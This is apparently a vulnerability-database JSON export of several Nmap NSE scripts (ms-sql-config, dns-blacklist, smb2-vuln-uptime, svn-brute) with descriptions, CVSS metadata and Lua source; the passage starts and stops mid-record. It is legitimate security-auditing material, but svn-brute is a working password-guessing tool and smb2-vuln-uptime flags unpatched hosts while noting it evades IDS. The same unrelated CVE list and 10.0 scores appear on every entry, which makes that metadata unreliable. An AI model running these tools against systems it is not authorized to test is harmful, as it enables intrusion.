<code>ms-sql-empty-password</code>\nand/or <code>mssql.username</code> & <code>mssql.password</code>)\nRun criteria:\n* Host script: Will run if the <code>mssql.instance-all</code>, <code>mssql.instance-name</code>\nor <code>mssql.instance-port</code> script arguments are used (see mssql.lua).\n* Port script: Will run against any services identified as SQL Servers, but only\nif the <code>mssql.instance-all</code>, <code>mssql.instance-name</code>\nand <code>mssql.instance-port</code> script arguments are NOT used.\n\nNOTE: Communication with instances via named pipes depends on the <code>smb</code>\nlibrary. To communicate with (and possibly to discover) instances via named pipes,\nthe host must have at least one SMB port (e.g. TCP 445) that was scanned and\nfound to be open. Additionally, named pipe connections may require Windows\nauthentication to connect to the Windows host (via SMB) in addition to the\nauthentication required to connect to the SQL Server instances itself. See the\ndocumentation and arguments for the <code>smb</code> library for more information.\n\nNOTE: By default, the ms-sql-* scripts may attempt to connect to and communicate\nwith ports that were not included in the port list for the Nmap scan. This can\nbe disabled using the <code>mssql.scanned-ports-only</code> script argument.\n]]\n\n---\n-- @usage\n-- nmap -p 1433 --script ms-sql-config --script-args mssql.username=sa,mssql.password=sa <host>\n--\n-- @args ms-sql-config.showall If set, shows all configuration options.\n--\n-- @output\n-- | ms-sql-config:\n-- | [192.168.100.25\\MSSQLSERVER]\n-- | Databases\n-- | name db_size owner\n-- | ==== ======= =====\n-- | nmap 2.74 MB MAC-MINI\\david\n-- | Configuration\n-- | name value inuse description\n-- | ==== ===== ===== ===========\n-- | SQL Mail XPs 0 0 Enable or disable SQL Mail XPs\n-- | Database Mail XPs 0 0 Enable or disable Database Mail XPs\n-- | SMO and DMO XPs 1 1 Enable or disable SMO and DMO XPs\n-- | Ole Automation Procedures 0 0 Enable or disable Ole Automation Procedures\n-- | xp_cmdshell 0 0 Enable or disable command shell\n-- | Ad Hoc Distributed Queries 0 0 Enable or disable Ad Hoc Distributed Queries\n-- | Replication XPs 0 0 Enable or disable Replication XPs\n-- | Linked Servers\n-- | srvname srvproduct providername\n-- | ======= ========== ============\n-- |_ MAC-MINI SQL Server SQLOLEDB\n--\n\n-- Created 04/02/2010 - v0.1 - created by Patrik Karlsson <patrik@cqure.net>\n-- Revised 02/01/2011 - v0.2 - Added ability to run against all instances on a host;\n-- added compatibility with changes in mssql.lua (Chris Woodbury)\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\"}\n\n\ndependencies = {\"broadcast-ms-sql-discover\", \"ms-sql-brute\", \"ms-sql-empty-password\"}\n\n--- Processes a set of instances\nlocal function process_instance( instance )\n\n local status, errorMessage\n local result, result_part = {}, {}\n local conf_filter = stdnse.get_script_args( {'mssql-config.showall', 'ms-sql-config.showall'} ) and \"\"\n or \" WHERE configuration_id > 16384\"\n local db_filter = stdnse.get_script_args( {'mssql-config.showall', 'ms-sql-config.showall'} ) and \"\"\n or \" WHERE name NOT IN ('master','model','tempdb','msdb')\"\n local helper = mssql.Helper:new()\n\n local queries = {\n [2]={ [\"Configuration\"] = [[ SELECT name,\n cast(value as varchar) value,\n cast(value_in_use as varchar) inuse,\n description\n FROM sys.configurations ]] .. conf_filter },\n [3]={ [\"Linked Servers\"] = [[ SELECT srvname, srvproduct, providername\n FROM master..sysservers\n WHERE srvid > 0 ]] },\n [1]={ [\"Databases\"] = [[ CREATE TABLE #nmap_dbs(name varchar(255), db_size varchar(255), owner varchar(255),\n dbid int, created datetime, status varchar(512), compatibility_level int )\n INSERT INTO #nmap_dbs EXEC sp_helpdb\n SELECT name, db_size, owner\n FROM #nmap_dbs ]] .. db_filter .. [[\n DROP TABLE #nmap_dbs ]] }\n }\n\n status, errorMessage = helper:ConnectEx( instance )\n if ( not(status) ) then result = \"ERROR: \" .. errorMessage end\n\n if status then\n status, errorMessage = helper:LoginEx( instance )\n if ( not(status) ) then result = \"ERROR: \" .. errorMessage end\n end\n\n for _, v in ipairs( queries ) do\n if ( not status ) then break end\n for header, query in pairs(v) do\n status, result_part = helper:Query( query )\n\n if ( not(status) ) then\n result = \"ERROR: \" .. result_part\n break\n end\n result_part = mssql.Util.FormatOutputTable( result_part, true )\n result_part.name = header\n table.insert( result, result_part )\n end\n end\n\n helper:Disconnect()\n\n -- TODO: structured output instead of format_output\n return stdnse.format_output(true, result)\nend\n\naction, portrule, hostrule = mssql.Helper.InitScript(process_instance)\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:00", "description": "Checks target IP addresses against multiple DNS anti-spam and open proxy blacklists and returns a list of services for which an IP has been flagged. Checks may be limited by service category (eg: SPAM, PROXY) or to a specific service name.\n\n## Script Arguments \n\n#### dns-blacklist.services \n\nstring containing a comma-separated list of services to query. (default: all)\n\n#### dns-blacklist.ip \n\nstring containing the IP to check only needed if running the script as a prerule.\n\n#### dns-blacklist.list \n\nlists all services that are available for a certain category.\n\n#### dns-blacklist.category \n\nstring containing the service category to query eg. spam or proxy (default: all)\n\n#### dns-blacklist.mode \n\nstring containing either \"short\" or \"long\" long mode can sometimes provide additional information to why an IP has been blacklisted. (default: long)\n\n## Example Usage \n \n \n nmap --script dns-blacklist --script-args='dns-blacklist.ip=<ip>'\n or\n nmap -sn <ip> --script dns-blacklist\n \n\n## Script Output \n \n \n Pre-scan script results:\n | dns-blacklist:\n | 1.2.3.4\n | PROXY\n | dnsbl.tornevall.org - PROXY\n | IP marked as \"abusive host\".\n | Proxy is working\n | Proxy has been scanned\n | SPAM\n | dnsbl.inps.de - SPAM\n | Spam Received See: http://www.sorbs.net/lookup.shtml?1.2.3.4\n | l2.apews.org - SPAM\n | list.quorum.to - SPAM\n | bl.spamcop.net - SPAM\n |_ spam.dnsbl.sorbs.net - SPAM\n \n Supported blacklist list mode (--script-args dns-blacklist.list):\n | dns-blacklist:\n | PROXY\n | socks.dnsbl.sorbs.net\n | http.dnsbl.sorbs.net\n | misc.dnsbl.sorbs.net\n | dnsbl.tornevall.org\n | SPAM\n | dnsbl.inps.de\n | bl.nszones.com\n | l2.apews.org\n | list.quorum.to\n | all.spamrats.com\n | bl.spamcop.net\n | spam.dnsbl.sorbs.net\n |_ sbl.spamhaus.org\n \n\n## Requires \n\n * [dnsbl](<../lib/dnsbl.html>)\n * [ipOps](<../lib/ipOps.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-12-26T14:22:25", "type": "nmap", "title": "dns-blacklist NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:DNS-BLACKLIST.NSE", "href": "https://nmap.org/nsedoc/scripts/dns-blacklist.html", "sourceData": "local dnsbl = require \"dnsbl\"\nlocal ipOps = require \"ipOps\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\n\ndescription = [[\nChecks target IP addresses against multiple DNS anti-spam and open\nproxy blacklists and returns a list of services for which an IP has been flagged. Checks may be limited by service category (eg: SPAM,\nPROXY) or to a specific service name. ]]\n\n---\n-- @usage\n-- nmap --script dns-blacklist --script-args='dns-blacklist.ip=<ip>'\n-- or\n-- nmap -sn <ip> --script dns-blacklist\n--\n-- @output\n-- Pre-scan script results:\n-- | dns-blacklist:\n-- | 1.2.3.4\n-- | PROXY\n-- | dnsbl.tornevall.org - PROXY\n-- | IP marked as \"abusive host\".\n-- | Proxy is working\n-- | Proxy has been scanned\n-- | SPAM\n-- | dnsbl.inps.de - SPAM\n-- | Spam Received See: http://www.sorbs.net/lookup.shtml?1.2.3.4\n-- | l2.apews.org - SPAM\n-- | list.quorum.to - SPAM\n-- | bl.spamcop.net - SPAM\n-- |_ spam.dnsbl.sorbs.net - SPAM\n--\n-- Supported blacklist list mode (--script-args dns-blacklist.list):\n-- | dns-blacklist:\n-- | PROXY\n-- | socks.dnsbl.sorbs.net\n-- | http.dnsbl.sorbs.net\n-- | misc.dnsbl.sorbs.net\n-- | dnsbl.tornevall.org\n-- | SPAM\n-- | dnsbl.inps.de\n-- | bl.nszones.com\n-- | l2.apews.org\n-- | list.quorum.to\n-- | all.spamrats.com\n-- | bl.spamcop.net\n-- | spam.dnsbl.sorbs.net\n-- |_ sbl.spamhaus.org\n--\n-- @args dns-blacklist.ip string containing the IP to check only needed if\n-- running the script as a prerule.\n--\n-- @args dns-blacklist.mode string containing either \"short\" or \"long\"\n-- long mode can sometimes provide additional information to why an IP\n-- has been blacklisted. (default: long)\n--\n-- @args dns-blacklist.list lists all services that are available for a\n-- certain category.\n--\n-- @args dns-blacklist.services string containing a comma-separated list of\n-- services to query. (default: all)\n--\n-- @args dns-blacklist.category string containing the service category to query\n-- eg. spam or proxy (default: all)\n--\n--\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"external\", \"safe\"}\n\n\n-- The script can be run either as a host- or pre-rule\nhostrule = function() return true end\nprerule = function() return true end\n\nlocal arg_IP = stdnse.get_script_args(SCRIPT_NAME .. \".ip\")\nlocal arg_mode = stdnse.get_script_args(SCRIPT_NAME .. \".mode\") or \"long\"\nlocal arg_list = stdnse.get_script_args(SCRIPT_NAME .. \".list\")\nlocal arg_services = stdnse.get_script_args(SCRIPT_NAME .. \".services\")\nlocal arg_category = stdnse.get_script_args(SCRIPT_NAME .. \".category\") or \"all\"\n\nlocal function listServices()\n local result = {}\n if ( \"all\" == arg_category ) then\n for cat in pairs(dnsbl.SERVICES) do\n local helper = dnsbl.Helper:new(cat, arg_mode)\n local cat_res= helper:listServices()\n cat_res.name = cat\n table.insert(result, cat_res)\n end\n else\n result = dnsbl.Helper:new(arg_category, arg_mode):listServices()\n end\n return stdnse.format_output(true, result)\nend\n\nlocal function formatResult(result)\n local output = {}\n for _, svc in ipairs(result) do\n if ( svc.result.details ) then\n svc.result.details.name = (\"%s - %s\"):format(svc.name, svc.result.state)\n table.insert(output, svc.result.details)\n else\n table.insert(output, (\"%s - %s\"):format(svc.name, svc.result.state))\n end\n end\n return output\nend\n\nlocal function fail (err) return stdnse.format_output(false, err) end\n\ndnsblAction = function(host)\n\n local helper\n if ( arg_services and ( not(arg_category) or \"all\" == arg_category:lower() ) ) then\n return fail(\"A service filter can't be used without a specific category\")\n elseif( \"all\" ~= arg_category ) then\n helper = dnsbl.Helper:new(arg_category, arg_mode)\n helper:setFilter(arg_services)\n local status, err = helper:validateFilter()\n if ( not(status) ) then\n return fail((\"%s\"):format(err))\n end\n end\n\n local output = {}\n if ( helper ) then\n local result = helper:checkBL(host.ip)\n if ( #result == 0 ) then return end\n output = formatResult(result)\n else\n for cat in pairs(dnsbl.SERVICES) do\n helper = dnsbl.Helper:new(cat, arg_mode)\n local result = helper:checkBL(host.ip)\n local out_part = formatResult(result)\n if ( #out_part > 0 ) then\n out_part.name = cat\n table.insert(output, out_part)\n end\n end\n if ( #output == 0 ) then return end\n end\n\n if ( \"prerule\" == SCRIPT_TYPE ) then\n output.name = host.ip\n end\n\n return stdnse.format_output(true, output)\nend\n\n\n-- execute the action function corresponding to the current rule\naction = function(...)\n\n if ( arg_mode ~= \"short\" and arg_mode ~= \"long\" ) then\n return fail(\"Invalid argument supplied, mode should be either 'short' or 'long'\")\n end\n\n if ( arg_IP and not(ipOps.todword(arg_IP)) ) then\n return fail(\"Invalid IP address was supplied\")\n end\n\n -- if the list argument was given, just list the services and abort\n if ( arg_list ) then\n return listServices()\n end\n\n if ( arg_IP and \"prerule\" == SCRIPT_TYPE ) then\n return dnsblAction( { ip = arg_IP } )\n elseif ( \"hostrule\" == SCRIPT_TYPE ) then\n return dnsblAction(...)\n end\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:34:52", "description": "Attempts to detect missing patches in Windows systems by checking the uptime returned during the SMB2 protocol negotiation. \n\nSMB2 protocol negotiation response returns the system boot time pre-authentication. This information can be used to determine if a system is missing critical patches without triggering IDS/IPS/AVs. \n\nRemember that a rebooted system may still be vulnerable. This check only reveals unpatched systems based on the uptime, no additional probes are sent. \n\nReferences: \n\n * <https://twitter.com/breakersall/status/880496571581857793>\n\n## Script Arguments \n\n#### smb2-vuln-uptime.skip-os \n\nIgnore OS detection results and show results\n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the [smb](<../lib/smb.html#script-args>) library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the [vulns](<../lib/vulns.html#script-args>) library. \n\n## Example Usage \n\n * nmap -O --script smb2-vuln-uptime <target>\n\n * nmap -p445 --script smb2-vuln-uptime --script-args smb2-vuln-uptime.skip-os=true <target>\n \n\n## Script Output \n \n \n | smb2-vuln-uptime:\n | VULNERABLE:\n | MS17-010: Security update for Windows SMB Server\n | State: LIKELY VULNERABLE\n | IDs: ms:ms17-010 CVE:2017-0147\n | This system is missing a security update that resolves vulnerabilities in\n | Microsoft Windows SMB Server.\n |\n | References:\n | https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-0147\n |_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n \n\n## Requires \n\n * [os](<>)\n * [datetime](<../lib/datetime.html>)\n * [smb](<../lib/smb.html>)\n * [vulns](<../lib/vulns.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [smb2](<../lib/smb2.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-28T09:01:02", "type": "nmap", "title": "smb2-vuln-uptime NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2021-01-18T21:21:43", "id": "NMAP:SMB2-VULN-UPTIME.NSE", "href": "https://nmap.org/nsedoc/scripts/smb2-vuln-uptime.html", "sourceData": "local os = require \"os\"\nlocal datetime = require \"datetime\"\nlocal smb = require \"smb\"\nlocal vulns = require \"vulns\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal smb2 = require \"smb2\"\nlocal table = require \"table\"\n\ndescription = [[\nAttempts to detect missing patches in Windows systems by checking the\nuptime returned during the SMB2 protocol negotiation.\n\nSMB2 protocol negotiation response returns the system boot time\n pre-authentication. This information can be used to determine\n if a system is missing critical patches without triggering IDS/IPS/AVs.\n\nRemember that a rebooted system may still be vulnerable. This check\nonly reveals unpatched systems based on the uptime, no additional probes are sent.\n\nReferences:\n* https://twitter.com/breakersall/status/880496571581857793\n]]\n\n---\n-- @usage nmap -O --script smb2-vuln-uptime <target>\n-- @usage nmap -p445 --script smb2-vuln-uptime --script-args smb2-vuln-uptime.skip-os=true <target>\n--\n-- @output\n-- | smb2-vuln-uptime:\n-- | VULNERABLE:\n-- | MS17-010: Security update for Windows SMB Server\n-- | State: LIKELY VULNERABLE\n-- | IDs: ms:ms17-010 CVE:2017-0147\n-- | This system is missing a security update that resolves vulnerabilities in\n-- | Microsoft Windows SMB Server.\n-- |\n-- | References:\n-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-0147\n-- |_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n--\n-- @xmloutput\n-- <table key=\"2017-0147\">\n-- <elem key=\"title\">MS17-010: Security update for Windows SMB Server</elem>\n-- <elem key=\"state\">LIKELY VULNERABLE</elem>\n-- <table key=\"ids\">\n-- <elem>CVE:2017-0147</elem>\n-- <elem>ms:ms17-010</elem>\n-- </table>\n-- <table key=\"description\">\n-- <elem>This system is missing a security update that resolves vulnerabilities in
 Microsoft Windows SMB Server.
</elem>\n-- </table>\n-- <table key=\"refs\">\n-- <elem>https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-0147</elem>\n-- <elem>https://technet.microsoft.com/en-us/library/security/ms17-010.aspx</elem>\n-- </table>\n-- </table>\n--\n-- @args smb2-vuln-uptime.skip-os Ignore OS detection results and show results\n---\n\nauthor = \"Paulino Calderon <calderon()calderonpale.com>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"vuln\", \"safe\"}\n\nhostrule = function(host)\n local ms = false\n local os_detection = stdnse.get_script_args(SCRIPT_NAME .. \".skip-os\") or false\n if host.os then\n for k, v in pairs(host.os) do -- Loop through OS matches\n if string.match(v['name'], \"Microsoft\") then\n ms = true\n end\n end\n end\n return (smb.get_port(host) ~= nil and ms) or (os_detection)\nend\n\nlocal ms_vulns = {\n {\n title = 'MS17-010: Security update for Windows SMB Server',\n ids = {ms = \"ms17-010\", CVE = \"2017-0147\"},\n desc = [[\nThis system is missing a security update that resolves vulnerabilities in\n Microsoft Windows SMB Server.\n]],\n disclosure_time = 1489471200,\n disclosure_date = {year=2017, month=3, day=14},\n references = {\n 'https://technet.microsoft.com/en-us/library/security/ms17-010.aspx',\n },\n },\n {\n title = 'Microsoft Kerberos Checksum Vulnerability',\n ids = {ms = \"ms14-068\", CVE = \"2014-6324\"},\n desc = [[\nThis security update resolves a privately reported vulnerability in Microsoft\n Windows Kerberos KDC that could allow an attacker to elevate unprivileged\n domain user account privileges to those of the domain administrator account.\n]],\n disclosure_time = 1416290400,\n disclosure_date = {year=2014, month=11, day=18},\n references = {\n 'https://technet.microsoft.com/en-us/library/security/ms14-068.aspx'\n },\n },\n}\n\nlocal function check_vulns(host, port)\n local smbstate, status\n local vulns_detected = {}\n\n status, smbstate = smb.start(host)\n status = smb2.negotiate_v2(smbstate)\n\n if not status then\n stdnse.debug2(\"Negotiation failed\")\n return nil, \"Protocol negotiation failed (SMB2)\"\n end\n\n datetime.record_skew(host, smbstate.time, os.time())\n stdnse.debug2(\"SMB2: Date: %s (%s) Start date:%s (%s)\",\n smbstate['date'], smbstate['time'],\n smbstate['start_date'], smbstate['start_time'])\n if smbstate['start_time'] == 0 then\n stdnse.debug2(\"Boot time not provided\")\n return nil, \"Boot time not provided\"\n end\n\n for _, vuln in pairs(ms_vulns) do\n if smbstate['start_time'] < vuln['disclosure_time'] then\n stdnse.debug2(\"Vulnerability detected\")\n vuln.extra_info = string.format(\"The system hasn't been rebooted since %s\", smbstate['start_date'])\n table.insert(vulns_detected, vuln)\n end\n end\n\n return true, vulns_detected\nend\n\naction = function(host,port)\n local status, vulnerabilities\n local report = vulns.Report:new(SCRIPT_NAME, host, port)\n\n status, vulnerabilities = check_vulns(host, port)\n if status then\n for i, v in pairs(vulnerabilities) do\n local vuln = { title = v['title'], description = v['desc'],\n references = v['references'], disclosure_date = v['disclosure_date'],\n IDS = v['ids']}\n vuln.state = vulns.STATE.LIKELY_VULN\n vuln.extra_info = v['extra_info']\n report:add_vulns(SCRIPT_NAME, vuln)\n end\n end\n return report:make_output()\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:33:58", "description": "Performs brute force password auditing against Subversion source code control servers.\n\n## Script Arguments \n\n#### svn-brute.repo \n\nthe Subversion repository against which to perform password guessing\n\n#### svn-brute.force \n\nforce password guessing when service is accessible both anonymously and through authentication\n\n#### passdb, unpwdb.passlimit, unpwdb.timelimit, unpwdb.userlimit, userdb \n\nSee the documentation for the [unpwdb](<../lib/unpwdb.html#script-args>) library. \n\n#### creds.[service], creds.global \n\nSee the documentation for the [creds](<../lib/creds.html#script-args>) library. \n\n#### brute.credfile, brute.delay, brute.emptypass, brute.firstonly, brute.guesses, brute.mode, brute.passonly, brute.retries, brute.start, brute.threads, brute.unique, brute.useraspass \n\nSee the documentation for the [brute](<../lib/brute.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script svn-brute --script-args svn-brute.repo=/svn/ -p 3690 <host>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 3690/tcp open svn syn-ack\n | svn-brute:\n | Accounts\n |_ patrik:secret => Login correct\n \n Summary\n -------\n x The svn class contains the code needed to perform CRAM-MD5\n authentication\n x The Driver class contains the driver implementation used by the brute\n library\n \n\n## Requires \n\n * [brute](<../lib/brute.html>)\n * [creds](<../lib/creds.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [stringaux](<../lib/stringaux.html>)\n * [openssl](<../lib/openssl.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-08-18T20:50:51", "type": "nmap", "title": "svn-brute NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-18T01:08:19", "id": "NMAP:SVN-BRUTE.NSE", "href": "https://nmap.org/nsedoc/scripts/svn-brute.html", "sourceData": "local brute = require \"brute\"\nlocal creds = require \"creds\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal stringaux = require \"stringaux\"\nlocal openssl = stdnse.silent_require \"openssl\"\n\ndescription = [[\nPerforms brute force password auditing against Subversion source code control servers.\n]]\n\n---\n-- @usage\n-- nmap --script svn-brute --script-args svn-brute.repo=/svn/ -p 3690 <host>\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 3690/tcp open svn syn-ack\n-- | svn-brute:\n-- | Accounts\n-- |_ patrik:secret => Login correct\n--\n-- Summary\n-- -------\n-- x The svn class contains the code needed to perform CRAM-MD5\n-- authentication\n-- x The Driver class contains the driver implementation used by the brute\n-- library\n--\n-- @args svn-brute.repo the Subversion repository against which to perform\n-- password guessing\n-- @args svn-brute.force force password guessing when service is accessible\n-- both anonymously and through authentication\n\n--\n-- Version 0.1\n-- Created 07/12/2010 - v0.1 - created by Patrik Karlsson <patrik@cqure.net>\n--\n\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"intrusive\", \"brute\"}\n\nportrule = shortport.port_or_service(3690, \"svnserve\", \"tcp\", \"open\")\n\nsvn =\n{\n svn_client = \"nmap-brute v0.1\",\n\n new = function(self, host, port, repo)\n local o = {}\n setmetatable(o, self)\n self.__index = self\n o.host = host\n o.port = port\n o.repo = repo\n o.invalid_users = {}\n return o\n end,\n\n --- Connects to the SVN - repository\n --\n -- @return status true on success, false on failure\n -- @return err string containing an error message on failure\n connect = function(self)\n local repo_url = ( \"svn://%s/%s\" ):format(self.host.ip, self.repo)\n local status, msg\n\n self.socket = brute.new_socket()\n\n local result\n status, result = self.socket:connect(self.host, self.port)\n if( not(status) ) then\n return false, result\n end\n\n status, msg = self.socket:receive_bytes(1)\n if ( not(status) or not( msg:match(\"^%( success\") ) ) then\n return false, \"Banner reports failure\"\n end\n\n msg = (\"( 2 ( edit-pipeline svndiff1 absent-entries depth mergeinfo log-revprops ) %d:%s %d:%s ( ) ) \"):format( #repo_url, repo_url, #self.svn_client, self.svn_client )\n status = self.socket:send( msg )\n if ( not(status) ) then\n return false, \"Send failed\"\n end\n\n status, msg = self.socket:receive_bytes(1)\n if ( not(status) ) then\n return false, \"Receive failed\"\n end\n\n if ( msg:match(\"%( success\") ) then\n local tmp = msg:match(\"%( success %( %( ([%S+%s*]-) %)\")\n if ( not(tmp) ) then return false, \"Failed to detect authentication\" end\n tmp = stringaux.strsplit(\" \", tmp)\n self.auth_mech = {}\n for _, v in pairs(tmp) do self.auth_mech[v] = true end\n elseif ( msg:match(\"%( failure\") ) then\n return false\n end\n\n return true\n end,\n\n --- Attempts to login to the SVN server\n --\n -- @param username string containing the login username\n -- @param password string containing the login password\n -- @return status, true on success, false on failure\n -- @return err string containing error message on failure\n login = function( self, username, password )\n local status, msg\n local challenge, digest\n\n if ( self.auth_mech[\"CRAM-MD5\"] ) then\n msg = \"( CRAM-MD5 ( ) ) \"\n status = self.socket:send( msg )\n\n status, msg = self.socket:receive_bytes(1)\n if ( not(status) ) then\n return false, \"error\"\n end\n\n challenge = msg:match(\"<.+>\")\n\n if ( not(challenge) ) then\n return false, \"Failed to read challenge\"\n end\n\n digest = stdnse.tohex(openssl.hmac('md5', password, challenge))\n msg = (\"%d:%s %s \"):format(#username + 1 + #digest, username, digest)\n self.socket:send( msg )\n\n status, msg = self.socket:receive_bytes(1)\n if ( not(status) ) then\n return false, \"error\"\n end\n\n if ( msg:match(\"Username not found\") ) then\n return false, \"Username not found\"\n elseif ( msg:match(\"success\") ) then\n return true, \"Authentication success\"\n else\n return false, \"Authentication failed\"\n end\n else\n return false, \"Unsupported auth-mechanism\"\n end\n\n end,\n\n --- Close the SVN connection\n --\n -- @return status true on success, false on failure\n close = function(self)\n return self.socket:close()\n end,\n\n}\n\n\nDriver =\n{\n new = function(self, host, port, invalid_users )\n local o = {}\n setmetatable(o, self)\n self.__index = self\n o.host = host\n o.port = port\n o.repo = stdnse.get_script_args('svn-brute.repo')\n o.invalid_users = invalid_users\n return o\n end,\n\n connect = function( self )\n local status, msg\n\n self.svn = svn:new( self.host, self.port, self.repo )\n status, msg = self.svn:connect()\n if ( not(status) ) then\n local err = brute.Error:new( \"Failed to connect to SVN server\" )\n -- This might be temporary, set the retry flag\n err:setRetry( true )\n return false, err\n end\n\n return true\n end,\n\n disconnect = function( self )\n self.svn:close()\n end,\n\n --- Attempts to login to the SVN server\n --\n -- @param username string containing the login username\n -- @param password string containing the login password\n -- @return status, true on success, false on failure\n -- @return brute.Error object on failure\n -- creds.Account object on success\n login = function( self, username, password )\n local status, msg\n\n if ( self.invalid_users[username] ) then\n return false, brute.Error:new( \"User is invalid\" )\n end\n\n status, msg = self.svn:login( username, password )\n\n if ( not(status) and msg:match(\"Username not found\") ) then\n self.invalid_users[username] = true\n return false, brute.Error:new(\"Username not found\")\n elseif ( status and msg:match(\"success\") ) then\n return true, creds.Account:new(username, password, creds.State.VALID)\n else\n return false, brute.Error:new( \"Incorrect password\" )\n end\n end,\n\n --- Verifies whether the repository is valid\n --\n -- @return status, true on success, false on failure\n -- @return err string containing an error message on failure\n check = function( self )\n local svn = svn:new( self.host, self.port, self.repo )\n local status = svn:connect()\n\n svn:close()\n\n if ( status ) then\n return true\n else\n return false, (\"Failed to connect to SVN repository (%s)\"):format(self.repo)\n end\n end,\n}\n\n\n\naction = function(host, port)\n local status, accounts\n\n local repo = stdnse.get_script_args('svn-brute.repo')\n local force = stdnse.get_script_args('svn-brute.force')\n\n if ( not(repo) ) then\n return \"No repository specified (see svn-brute.repo)\"\n end\n\n local svn = svn:new( host, port, repo )\n local status = svn:connect()\n\n if ( status and svn.auth_mech[\"ANONYMOUS\"] and not(force) ) then\n return \" \\n Anonymous SVN detected, no authentication needed\"\n end\n\n if ( not(svn.auth_mech) or not( svn.auth_mech[\"CRAM-MD5\"] ) ) then\n return \" \\n No supported authentication mechanisms detected\"\n end\n\n local invalid_users = {}\n local engine = brute.Engine:new(Driver, host, port, invalid_users)\n engine.options.script_name = 